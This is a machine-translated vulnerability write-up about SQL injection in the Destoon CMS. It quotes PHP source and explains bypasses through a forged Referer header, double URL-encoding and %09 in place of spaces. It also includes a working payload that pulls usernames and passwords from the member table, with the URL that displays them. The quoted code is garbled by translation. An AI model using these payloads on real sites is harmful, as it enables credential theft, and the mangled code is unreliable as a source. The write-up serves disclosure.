Destoon full version kill SQL injection 2

I personally think that we should not only check user input, but should check before SQL queries to better prevent injection, because there are always omissions.

Common. inc. php 0x00

If (! Empty ($ _ SERVER ['request _ URI ']) strip_uri ($ _ SERVER ['request _ URI']); // follow up with 0x01if ($ _ POST) {$ _ POST = strip_ SQL ($ _ POST); strip_key ($ _ POST);} if ($ _ GET) {$ _ GET = strip_ SQL ($ _ GET ); strip_key ($ _ GET );}... if ($ _ POST) extract ($ _ POST, EXTR_SKIP); if ($ _ GET) extract ($ _ GET, EXTR_SKIP );... $ DT_REF = get_env ('Referer'); // follow up 0x01... $ forward = isset ($ forward )? Urldecode ($ forward): $ DT_REF; // injection 1 follows up with 0x02. If forward is not set, use referer instead. referer is controlled by us and is not affected by GPC, it is not affected by filtering .... $ Kw = isset ($ _ GET ['kw '])? Htmlspecialchars (str_replace (array ("\ '"), array (''), trim (urldecode ($ _ GET ['kw']):''; // inject 2 follow-up 0x03. Here, the programmer actually wants to replace 'with null, so it should write array (' \ '), but he uses double quotes, this means to replace \ 'with null. here we can use urldecode to successfully bypass universal anti-injection and introduce single quotes. The program checks that REQUEST_URI does not contain ', so this is only on the IIS platform, and it is required to run with cgi/fastcgi to not obtain data and thus bypass. // http://support.microsoft.com/kb/954946/zh-cn//http://support.microsoft.com/kb/2277918/zh-cn $ Keyword = $ kw? Str_replace (array ('', '*'), array ('%', '%'), $ kw):''; // Replace the space with %, just use % 09 to bypass it .... Include/global. func. php 0x01function strip_uri ($ uri) {if (strpos ($ uri, '% ')! = False) {while ($ uri! = Urldecode ($ uri) {$ uri = urldecode ($ uri) ;}} if (strpos ($ uri, '<')! = False | strpos ($ uri ,"'")! = False | strpos ($ uri ,'"')! = False | strpos ($ uri, '0x ')! = False) {// 'dhttp (403, 0); dalert ('HTTP 403 Forbidden ', DT_PATH) ;}} function strip_ SQL ($ string) cannot appear) {// the referer can be forged, and can be bypassed through urldecode decoding, ignoring the following. $ Search = array ("/union/I", "/0x ([a-z0-9] {2,})/I", "/select ([[: space:] \ * \/\-])/I ","/update ([[: space:] \ * \/])/I ","/replace ([[: space:] \ * \/])/I ","/delete ([[: space:] \ * \/])/I ","/drop ([[: space:] \ * \/])/I ","/outfile ([[: space:] \ * \/])/I ","/dumpfile ([[: space:] \ * \/])/I ","/load_file \ (/I ","/substring \ (/I ","/substr \ (/I ", "/concat \ (/I", "/concat_ws \ (/I", "/ascii \ (/I", "/hex \ (/I ", "/ord \ (/I", "/char \ (/I"); $ replace = array ('Unio & #110; ', '0 & #120; \ 1', 'selec & #116; \ 1', 'updat & #101; \ 1', 'replac & #101; \ 1', 'delet & #101; \ 1', 'Dro & #112; \ 1 ', 'outfil & #101; \ 1', 'dumpfil & #101; \ 1', 'Load _ fil & #101; (', 'substrin & #103; (', 'subst & #114; (', 'conca & #116; (', 'concat _ w & #115; (', 'asci & #105; (',' he & #120; (',' or & #100; (', 'cha & #114; ('); return is_array ($ string )? Array_map ('strip _ SQL ', $ string): preg_replace ($ search, $ replace, $ string);} function get_env ($ type) {switch ($ type) {case 'IP ':... case 'Referer': return isset ($ _ SERVER ['HTTP _ referer'])? $ _ SERVER ['HTTP _ referer']: ''; // Forge .... Module/member/chat. inc. php 0x02if ($ chat) {// The conversation already exists if ($ chat ['touser'] == _ username) {// if ($ DT_TIME-$ chat ['freadtime']> $ MOD ['chat _ poll '] * 3) {// The initiator has disconnected $ db-> query ("UPDATE {$ table} SET fromuser = '$ chat_fromuser', touser = '$ chat_touser ', tgettime = 0 WHERE chatid = '$ chatid' ");} else {// initiator online dheader ('? Chatid = '. $ chatid);} //} else {// if ($ DT_TIME-$ chat ['treadtime']> $ MOD ['chat _ poll '] * 3) {// the recipient has disconnected $ db-> query ("UPDATE {$ table} SET tgettime = 0 WHERE chatid = '$ chatid '");} else {// recipient online //} else {$ forward = dsafe ($ forward); if (strpos ($ forward, $ MOD ['linkurl'])! = False) $ forward = ''; // create a new dialog $ db-> query (" insert into {$ table} (chatid, fromuser, touser, tgettime, forward) VALUES ('$ chat_id', '$ chat_fromuser', '$ chat_touser', '0', '$ forward') "); // counterfeit referer injection. /* Wooyun '), (12345679801234567890123456789012, (select concat (username, 0x2C, password) from destoon_member limit), 'test2test', 4, '5

Access

Http: // localhost/de/member/chat. php? Chatid = 12345678901234567890123456789012

The returned data is displayed.

* //} Else if (isset ($ chatid) & is_md5 ($ chatid )) {$ chat = $ db-> get_one ("SELECT * FROM {$ table} WHERE chatid = '$ chatid '"); if ($ chat & $ chat ['touser'] =$ _ username) {$ chat_id = $ chatid; $ chat_status = 3; if (check_name ($ chat ['fromuser']) {if ($ DT_TIME-$ chat ['freadtime']> $ MOD ['chat _ poll '] * 3) {// The initiator has disconnected $ db-> query ("UPDATE {$ table} SET tgettime = 0 WHERE chatid = '$ chatid'"); dheader ('chat. php? Touser = '. $ chat ['fromuser']);} $ user = userinfo ($ chat ['fromuser']); $ online = online ($ user ['userid']); $ user ['type'] = 'member';} else {$ user = array (); $ user ['type'] = 'guest '; $ user ['IP'] = $ chat ['fromuser']; $ user ['region'] = ip2area ($ chat ['fromuser']); if ($ DT_TIME-$ chat ['freadtime']> $ MOD ['chat _ poll '] * 3) {// The initiator is a tourist and has been disconnected, you can only view records $ time = $ DT_TIME-$ MOD ['chat _ poll '] * 4; $ db-> query ("UPDATE {$ tab Le} SET freadtime = '$ time' WHERE chatid =' $ chatid' "); }}$ head_title = 'and '. ($ user ['type'] = 'guest '? '[Visitor]': $ chat ['fromuser']). 'Dialog ';} else {dheader ('chat. php ');} $ type = 2;} api/select. php 0x03login (); if ($ action = 'item') {$ mid> 3 or dheader ('dt _ path'); $ from = isset ($ from )? Trim ($ from): 'item'; isset ($ username) or $ username = ''; $ condition = $ mid = 4? 'Groupid> 5': 'status = 3'; if ($ keyword) $ condition. = "AND keyword LIKE '% $ keyword %'"; // under the conditions described above, single quotes AND double-encoding injection can be successfully introduced, for example, select can be encoded as selec % 2574 for bypass. If ($ from = 'relate' & $ mid = 16) {check_name ($ username) or exit; $ condition. = "AND username = '$ username'";} else {if ($ _ groupid = 1) {if ($ from = 'member') $ condition. = "AND username = '$ _ username'";} else {$ condition. = "AND username = '$ _ username'" ;}} if ($ itemid) $ condition. = $ mid = 4? "AND userid = $ itemid": "AND itemid = $ itemid"; $ order = $ mid = 4? 'Userid desc': 'addtime desc'; $ table = get_table ($ mid); $ r = $ db-> get_one ("select count (*) AS num FROM {$ table} WHERE $ condition "); // import the query. $ Items = $ r ['num']; $ pages = pages ($ items, $ page, $ pagesize); $ lists = array (); $ result = $ db-> query ("SELECT * FROM {$ table} WHERE $ condition order by $ order LIMIT $ offset, $ pagesize ");